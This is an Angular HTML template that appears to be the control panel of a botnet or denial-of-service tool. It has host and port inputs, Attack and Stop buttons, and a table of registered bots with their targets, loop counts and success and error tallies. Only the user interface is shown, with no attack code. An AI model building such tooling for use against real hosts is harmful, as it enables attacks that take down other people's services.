<div>
  HOST: <input type="text" [(ngModel)]="host" />
  PORT: <input type="number" [(ngModel)]="port" />
</div>
<button (click)="attack()">Attack</button>
<button (click)="stop()">Stop</button>

<h1>Registred bots</h1>
<table border="1">
  <tr>
    <th>#</th>
    <th>Bot</th>
    <th>Status</th>
    <th>Target</th>
    <th>Loop</th>
    <th>Success</th>
    <th>Error</th>
  </tr>
  <tr *ngFor="let bot of bots; let index=index">
    <td>{{index + 1}}</td>
    <td>{{bot.botUrl}}</td>
    <td>{{bot.status}}</td>
    <td>{{bot.target?.host}}:{{bot.target?.port}}</td>
    <td>{{bot.loop}}</td>
    <td>{{bot.success}}</td>
    <td>{{bot.error}}</td>
  </tr>
</table>